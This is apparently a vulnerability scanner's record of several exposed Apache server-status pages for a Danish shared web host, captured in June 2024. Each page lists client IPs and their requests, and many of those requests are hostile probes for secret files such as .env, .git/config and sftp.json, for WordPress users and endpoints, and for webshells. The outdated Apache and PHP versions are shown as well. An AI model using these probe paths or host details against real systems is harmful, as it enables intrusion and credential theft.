ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde368291c30
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 08-Jun-2024 16:21:42 CEST Restart Time: Saturday, 08-Jun-2024 16:05:03 CEST Parent Server Generation: 0 Server uptime: 16 minutes 39 seconds Total accesses: 1122 - Total Traffic: 600 kB CPU Usage: u1.12 s.44 cu0 cs0 - .156% CPU load 1.12 requests/sec - 615 B/second - 547 B/request 1 requests currently being processed, 34 idle workers ___W_______________________________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0498580/33/33_ 0.06900.00.030.03 139.162.141.82webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 1-0498590/33/33_ 0.04800.00.020.02 67.205.157.83webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 2-0498600/33/33_ 0.05000.00.020.02 164.90.208.56webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 3-0498610/32/32W 0.05000.00.010.01 164.90.208.56webhotel5.webhosting.dkGET /server-status HTTP/1.0 4-0498620/32/32_ 0.051900.00.010.01 114.119.133.83webhotel5.webhosting.dkimages/thumbs/films/16945/350x233_thumb-Scene5-005.jpg HTTP/1.0 5-0498630/32/32_ 0.041660.00.020.02 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 6-0498640/32/32_ 0.051400.00.020.02 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-0498650/32/32_ 0.051200.00.020.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-0498660/32/32_ 0.041120.00.010.01 139.162.141.82webhotel5.webhosting.dkGET / HTTP/1.0 9-0498670/32/32_ 0.041030.00.030.03 54.202.0.127webhotel5.webhosting.dkGET / HTTP/1.0 10-0498680/32/32_ 0.051030.00.020.02 139.162.141.82webhotel5.webhosting.dkGET / HTTP/1.0 11-0498690/32/32_ 0.041010.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /server HTTP/1.0 12-0498700/32/32_ 0.061000.00.010.01 139.162.141.82webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 13-0498720/32/32_ 0.041000.00.010.01 139.162.141.82webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 14-0498730/32/32_ 0.041000.00.010.01 139.162.141.82webhotel5.webhosting.dkGET /about HTTP/1.0 15-0498740/32/32_ 0.03900.00.010.01 139.162.141.82webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 16-0498750/32/32_ 0.04900.00.010.01 139.162.141.82webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 17-0498760/32/32_ 0.05910.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /server-status HTTP/1.0 18-0498770/32/32_ 0.04900.00.010.01 139.162.141.82webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 19-0498780/32/32_ 0.04900.00.010.01 139.162.141.82webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 20-0500270/32/32_ 0.04900.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /login.action HTTP/1.0 21-0501640/32/32_ 0.04900.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /.env HTTP/1.0 22-0501650/32/32_ 0.04900.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /.git/config HTTP/1.0 23-0502740/31/31_ 0.05950.00.010.01 147.185.132.75webhotel5.webhosting.dkGET / HTTP/1.0 24-0502750/32/32_ 0.04900.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /config.json HTTP/1.0 25-0502760/32/32_ 0.04020.00.010.01 164.90.208.56webhotel5.webhosting.dkGET / HTTP/1.0 26-0502770/32/32_ 0.05800.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 27-0503720/32/32_ 0.05830.00.020.02 139.162.141.82webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 28-0503730/32/32_ 0.03800.00.020.02 67.205.157.83webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 29-0503740/32/32_ 0.04020.00.020.02 164.90.208.56webhotel5.webhosting.dkGET / HTTP/1.0 30-0503750/32/32_ 0.04000.00.020.02 164.90.208.56webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 31-0503770/32/32_ 0.05000.00.020.02 164.90.208.56webhotel5.webhosting.dkGET /server HTTP/1.0 32-0503780/32/32_ 0.05000.00.020.02 164.90.208.56webhotel5.webhosting.dkGET /about HTTP/1.0 33-0503790/32/32_ 0.05000.00.010.01 164.90.208.56webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 34-0503800/32/32_ 0.05000.00.020.02 164.90.208.56webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde34fd854e8
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 06-Jun-2024 16:47:24 CEST Restart Time: Thursday, 06-Jun-2024 06:05:04 CEST Parent Server Generation: 10 Server uptime: 10 hours 42 minutes 20 seconds Total accesses: 26432 - Total Traffic: 16.2 MB CPU Usage: u.66 s.19 cu0 cs0 - .00221% CPU load .686 requests/sec - 439 B/second - 640 B/request 1 requests currently being processed, 30 idle workers __________________W___________._................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-10234060/12/833_ 0.01800.00.000.52 172.71.182.209webhotel5.webhosting.dkGET //wp1/wp-includes/wlwmanifest.xml HTTP/1.0 1-10240310/11/829_ 0.01800.00.000.98 172.71.182.209webhotel5.webhosting.dkGET //wp2/wp-includes/wlwmanifest.xml HTTP/1.0 2-10240780/11/828_ 0.01800.00.000.30 172.71.182.209webhotel5.webhosting.dkGET //site/wp-includes/wlwmanifest.xml HTTP/1.0 3-10245430/11/828_ 0.01000.00.000.62 157.245.36.108webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-10245440/11/826_ 0.01000.00.010.28 157.245.36.108webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 5-10245890/10/823_ 0.001000.00.000.30 91.92.244.81www.stengade22.dkGET /wp-includes/ID3/index.php HTTP/1.0 6-10247280/10/825_ 0.00900.00.010.44 172.71.182.209webhotel5.webhosting.dkGET //2020/wp-includes/wlwmanifest.xml HTTP/1.0 7-10247380/10/826_ 0.01900.00.000.33 172.71.182.209webhotel5.webhosting.dkGET //shop/wp-includes/wlwmanifest.xml HTTP/1.0 8-10247390/10/822_ 0.00900.00.010.54 172.71.182.209webhotel5.webhosting.dkGET //2019/wp-includes/wlwmanifest.xml HTTP/1.0 9-10251740/10/816_ 0.02800.00.001.17 172.71.182.209webhotel5.webhosting.dkGET //cms/wp-includes/wlwmanifest.xml HTTP/1.0 10-10252460/10/816_ 0.02100.00.000.27 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-10252860/10/816_ 0.00000.00.000.36 185.211.58.110webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 12-10252870/10/813_ 0.01000.00.000.54 157.245.36.108webhotel5.webhosting.dkGET /server HTTP/1.0 13-10264890/6/805_ 0.01030.00.000.42 157.245.36.108webhotel5.webhosting.dkGET / HTTP/1.0 14-10215010/15/812_ 0.02900.00.010.36 172.71.182.209webhotel5.webhosting.dkGET //wp/wp-includes/wlwmanifest.xml HTTP/1.0 15-10233210/12/800_ 0.01900.00.000.33 172.71.182.209webhotel5.webhosting.dkGET //news/wp-includes/wlwmanifest.xml HTTP/1.0 16-10245400/11/795_ 0.01000.00.000.30 157.245.36.108webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 17-10237180/12/763_ 0.01000.00.000.54 157.245.36.108webhotel5.webhosting.dkGET /about HTTP/1.0 18-10237440/11/740W 0.01000.00.000.33 157.245.36.108webhotel5.webhosting.dkGET /server-status HTTP/1.0 19-10237450/11/731_ 0.011100.00.000.72 172.71.182.209webhotel5.webhosting.dkGET //xmlrpc.php?rsd HTTP/1.0 20-10237530/11/718_ 0.011000.00.000.25 172.71.182.209webhotel5.webhosting.dkGET //blog/wp-includes/wlwmanifest.xml HTTP/1.0 21-10237540/11/709_ 0.011000.00.000.33 172.71.182.209webhotel5.webhosting.dkGET //web/wp-includes/wlwmanifest.xml HTTP/1.0 22-10237550/11/722_ 0.011000.00.001.51 172.71.182.209webhotel5.webhosting.dkGET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.0 23-10237560/11/681_ 0.011000.00.000.27 172.71.182.209webhotel5.webhosting.dkGET //website/wp-includes/wlwmanifest.xml HTTP/1.0 24-10241140/11/681_ 0.01700.00.000.24 172.71.182.209webhotel5.webhosting.dkGET //sito/wp-includes/wlwmanifest.xml HTTP/1.0 25-10245800/10/679_ 0.021050.00.000.29 172.71.182.209webhotel5.webhosting.dkGET / HTTP/1.0 26-10244530/11/648_ 0.01500.00.000.25 94.156.71.219webhotel5.webhosting.dkGET /wp-includes/php-compat/index.php HTTP/1.0 27-10245320/11/644_ 0.01200.00.000.23 91.92.244.81www.stengade22.dkGET /wp-includes/index.php HTTP/1.0 28-10245360/11/576_ 0.020100.00.000.59 157.245.36.108webhotel5.webhosting.dkGET / HTTP/1.0 29-10245370/11/570_ 0.01000.00.000.20 157.245.36.108webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 30-10-0/0/516. 0.0952800.00.000.44 75.74.123.83webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 31-10234170/12/538_ 0.00800.00.010.28 172.71.182.209webhotel5.webhosting.dkGET //test/wp-includes/wlwmanifest.xml HTTP/1.0 32-9-0/0/511. 0.00283500.00.000.18 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-9-0/0/511. 0.00283500.00.000.62 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-9-0/0/280. 0.00283500.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-9-0/0/232. 0.00283500.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-9-0/0/228. 0.09310630.00.000.08 63.143.42.253webhotel5.webhosting.dkHEAD / HTTP/1.0 37-9-0/0/229. 0.08311700.00.000.09 185.231.113.38webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 38-9-0/0/221. 0.07309720.00.000.08 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-9-0/0/221. 0.08309700.00.000.22 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 40-9-0/0/85. 0.06538900.00.000.03 84.247.148.174webhotel5.webhosting.dkGET //HanShllV1.php HTTP/1.0 41-9-0/0/85. 0.07538900.00.000.03 84.247.148.174webhotel5.webhosting.dkGET //GreyHat.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde39d0c57d8
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 04-Jun-2024 19:45:26 CEST Restart Time: Tuesday, 04-Jun-2024 06:05:04 CEST Parent Server Generation: 13 Server uptime: 13 hours 40 minutes 22 seconds Total accesses: 53893 - Total Traffic: 60.2 MB CPU Usage: u1.35 s.56 cu0 cs0 - .00388% CPU load 1.09 requests/sec - 1282 B/second - 1171 B/request 1 requests currently being processed, 32 idle workers __________________________W_____......_......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-13291250/25/1617_ 0.05500.00.591.59 139.59.231.238webhotel5.webhosting.dkGET /about HTTP/1.0 1-13291120/25/1602_ 0.031020.00.581.33 139.59.231.238webhotel5.webhosting.dkGET / HTTP/1.0 2-13291310/24/1588_ 0.032600.00.681.62 46.123.252.192webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 3-13291840/24/1606_ 0.03350.00.581.87 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 4-13291320/24/1610_ 0.041920.00.471.12 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 5-13298590/20/1574_ 0.0211420.00.242.58 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 6-13291540/24/1612_ 0.051000.00.411.16 81.19.232.105webhotel5.webhosting.dkGET /.env HTTP/1.0 7-13291560/24/1608_ 0.03700.00.591.40 139.59.231.238webhotel5.webhosting.dkGET /server HTTP/1.0 8-13291570/24/1606_ 0.036760.00.392.41 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 9-13291260/25/1610_ 0.04420.00.401.17 199.45.155.31webhotel5.webhosting.dkGET / HTTP/1.0 10-13291330/24/1603_ 0.031830.00.521.95 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 11-13291850/24/1606_ 0.03300.00.581.54 139.59.231.238webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 12-13291220/25/1607_ 0.031000.00.561.78 81.19.232.105webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 13-13291860/24/1603_ 0.02200.00.603.22 199.45.155.31webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 14-13291870/24/1555_ 0.03100.00.641.52 139.59.231.238webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 15-13291230/25/1511_ 0.041020.00.481.26 81.19.232.105webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 16-13300090/19/1452_ 0.021000.00.461.24 81.19.232.105webhotel5.webhosting.dkGET /.git/config HTTP/1.0 17-13301990/18/1523_ 0.031100.00.230.93 213.202.233.34webhotel5.webhosting.dkGET /inputs.php HTTP/1.0 18-13302010/18/1520_ 0.041000.00.121.69 81.19.232.105webhotel5.webhosting.dkGET /login.action HTTP/1.0 19-13302020/18/1523_ 0.021000.00.271.81 81.19.232.105webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 20-13302190/18/1518_ 0.021000.00.121.10 81.19.232.105webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 21-13302200/18/1499_ 0.031000.00.231.05 81.19.232.105webhotel5.webhosting.dkGET /config.json HTTP/1.0 22-13291240/25/1472_ 0.04600.00.511.91 139.59.231.238webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 23-13302210/18/1455_ 0.03840.00.241.06 139.59.231.238webhotel5.webhosting.dkGET / HTTP/1.0 24-13302220/18/1421_ 0.03850.00.231.18 199.45.155.31webhotel5.webhosting.dkGET / HTTP/1.0 25-13291270/25/1344_ 0.05200.00.501.08 139.59.231.238webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 26-13291280/24/1372W 0.04000.00.662.37 139.59.231.238webhotel5.webhosting.dkGET /server-status HTTP/1.0 27-13291340/24/1362_ 0.021800.00.531.92 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 28-13291350/24/1287_ 0.031500.00.591.33 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 29-13291360/24/1261_ 0.031112000.00.531.45 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 30-13291370/24/1283_ 0.031111450.00.401.06 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 31-13312940/12/1157_ 0.011000.00.000.79 81.19.232.105webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 32-13-0/0/1092. 0.1055800.00.001.15 81.19.232.105www.reuterfoto.dkGET /bryllup/t_bryllup12.jpg%20 HTTP/1.0 33-13-0/0/1045. 0.0855310.00.000.82 81.19.232.105www.reuterfoto.dkGET /reuterfoto-forside/6_reuterfoto_portrat.jpg HTTP/1.0 34-13-0/0/868. 0.0755200.00.000.74 81.19.232.105www.reuterfoto.dkGET /reuterfoto-forside/6_reuterfoto_portrat.jpg HTTP/1.0 35-13-0/0/640. 0.0855200.00.005.56 81.19.232.105www.reuterfoto.dkGET /reuterfoto-forside/6_reuterfoto_portrat.jpg HTTP/1.0 36-13-0/0/526. 0.0955200.00.000.66 81.19.232.105www.reuterfoto.dkGET /reuterfoto-forside/6_reuterfoto_portrat.jpg HTTP/1.0 37-13-0/0/429. 0.0955110.00.000.47 81.19.232.105www.reuterfoto.dkGET /reuterfoto-forside/6_reuterfoto_portrat.jpg HTTP/1.0 38-13291380/24/242_ 0.031100.00.270.45 81.19.232.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 39-11-0/0/218. 0.05854600.00.000.08 138.199.18.141webhotel5.webhosting.dkGET /labs/wp-admin/ HTTP/1.0 40-9-0/0/168. 0.071403900.00.000.07 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-9-0/0/168. 0.071404100.00.000.11 81.19.232.105webhotel5.webhosting.dks/PhotoRoom_021_20230530_130423_1400x.jpg?v=1685445649 HTTP/1.0 42-9-0/0/134. 0.021351700.00.000.09 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-9-0/0/84. 0.011351700.00.000.14 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-9-0/0/82. 0.011351700.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-9-0/0/65. 0.011351700.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-9-0/0/65. 0.011351700.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-4-0/0/50. 0.063233600.00.000.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 48-4-0/0/50. 0.063233600.00.000.10 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3d5c82570
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 02-Jun-2024 11:56:44 CEST Restart Time: Sunday, 02-Jun-2024 04:00:06 CEST Parent Server Generation: 7 Server uptime: 7 hours 56 minutes 38 seconds Total accesses: 30835 - Total Traffic: 17.5 MB CPU Usage: u1.29 s.52 cu0 cs0 - .00633% CPU load 1.08 requests/sec - 640 B/second - 594 B/request 1 requests currently being processed, 32 idle workers ____________________W.__________.__............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-7479690/22/915_ 0.03000.00.010.40 81.19.232.105webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 1-7477450/22/914_ 0.03220.00.010.44 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 2-7477750/22/911_ 0.03100.00.010.33 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 3-7480150/21/912_ 0.04710.00.000.45 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 4-7478920/22/909_ 0.04000.00.010.28 172.105.16.131webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 5-7477180/22/909_ 0.03220.00.010.45 172.105.16.131webhotel5.webhosting.dkGET / HTTP/1.0 6-7478890/22/909_ 0.03100.00.010.39 81.19.232.105webhotel5.webhosting.dkGET /.env HTTP/1.0 7-7479860/22/909_ 0.04030.00.010.45 81.19.232.105webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 8-7480160/21/907_ 0.02370.00.012.26 52.167.144.191www.woodwind.dkGET /lefreque%20sound%20plates.htm HTTP/1.0 9-7479280/22/907_ 0.04000.00.010.64 81.19.232.105webhotel5.webhosting.dkGET /config.json HTTP/1.0 10-7480200/21/907_ 0.03120.00.010.35 172.105.16.131webhotel5.webhosting.dkGET / HTTP/1.0 11-7480220/21/907_ 0.03100.00.000.47 81.19.232.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-7480450/21/906_ 0.02100.00.010.45 172.105.16.131webhotel5.webhosting.dkGET /server HTTP/1.0 13-7480530/21/906_ 0.02100.00.010.36 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 14-7480540/21/904_ 0.02100.00.010.55 81.19.232.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 15-7480640/21/883_ 0.02140.00.010.38 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 16-7480650/21/904_ 0.04100.00.010.97 81.19.232.105webhotel5.webhosting.dkGET /login.action HTTP/1.0 17-7482510/20/884_ 0.03700.00.010.28 185.211.59.11webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-7482610/20/883_ 0.042230.00.000.35 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 19-7529260/8/820_ 0.01000.00.000.42 172.105.16.131webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 20-7529270/7/869W 0.01000.00.000.40 172.105.16.131webhotel5.webhosting.dkGET /server-status HTTP/1.0 21-7-0/0/794. 0.0747400.00.000.26 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-7467370/27/769_ 0.04000.00.010.44 81.19.232.105webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 23-7477850/22/709_ 0.02100.00.010.29 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 24-7478140/22/709_ 0.03100.00.010.32 81.19.232.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 25-7478560/22/707_ 0.04100.00.010.53 81.19.232.105webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 26-7478900/22/702_ 0.03100.00.010.41 172.105.16.131webhotel5.webhosting.dkGET /about HTTP/1.0 27-7480040/21/696_ 0.021130.00.010.32 81.19.232.105www.discteknik.dkGET /Ducati%20salg/monster3.htm HTTP/1.0 28-7480140/20/683_ 0.03900.00.010.50 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-7480660/21/647_ 0.03100.00.010.44 172.105.16.131webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 30-7480670/21/661_ 0.03110.00.020.36 81.19.232.105webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 31-7529280/8/577_ 0.01000.00.000.39 172.105.16.131webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 32-7-0/0/566. 0.08128200.00.000.34 40.91.68.136webhotel5.webhosting.dkGET /webroot/.env HTTP/1.0 33-7467380/27/494_ 0.03100.00.010.20 81.19.232.105webhotel5.webhosting.dkGET /.git/config HTTP/1.0 34-7467390/27/458_ 0.04100.00.010.26 66.249.74.41webhotel5.webhosting.dkGET /gallerier/alle/Brunetter-46/nyeste?gallery_page=3 HTTP/1.0 35-6-0/0/408. 0.09433850.00.000.18 191.102.149.85webhotel5.webhosting.dkGET / HTTP/1.0 36-6-0/0/409. 0.07433700.00.000.16 34.234.11.9webhotel5.webhosting.dkGET /favicon.png HTTP/1.0 37-7-0/0/301. 0.06296700.00.000.20 64.176.221.15webhotel5.webhosting.dkHEAD /main HTTP/1.0 38-7-0/0/251. 0.05296700.00.000.10 64.176.221.15webhotel5.webhosting.dkHEAD /old HTTP/1.0 39-7-0/0/251. 0.07294600.00.000.15 81.19.232.105webhotel5.webhosting.dkis-giving-a-romantic-flight-over-las-vegas-sky-2761151 HTTP/1.0 40-7-0/0/251. 0.05306800.00.000.08 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-7-0/0/251. 0.06296400.00.000.11 103.150.60.179webhotel5.webhosting.dkins/acf-frontend-form-element/assets/js/try-pro-min.js HTTP/1.0 42-7-0/0/201. 0.05296700.00.000.15 64.176.221.15webhotel5.webhosting.dkHEAD /new HTTP/1.0 43-7-0/0/201. 0.05294800.00.000.11 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 44-7-0/0/111. 0.06293200.00.000.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 45-7-0/0/112. 0.06295730.00.000.06 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 46-4-0/0/41. 0.041059400.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde38516d2f5
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 02-Jun-2024 00:08:28 CEST Restart Time: Saturday, 01-Jun-2024 16:05:04 CEST Parent Server Generation: 8 Server uptime: 8 hours 3 minutes 24 seconds Total accesses: 25006 - Total Traffic: 62.7 MB CPU Usage: u.86 s.27 cu0 cs0 - .0039% CPU load .862 requests/sec - 2267 B/second - 2629 B/request 1 requests currently being processed, 30 idle workers W_____________________________........_......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU 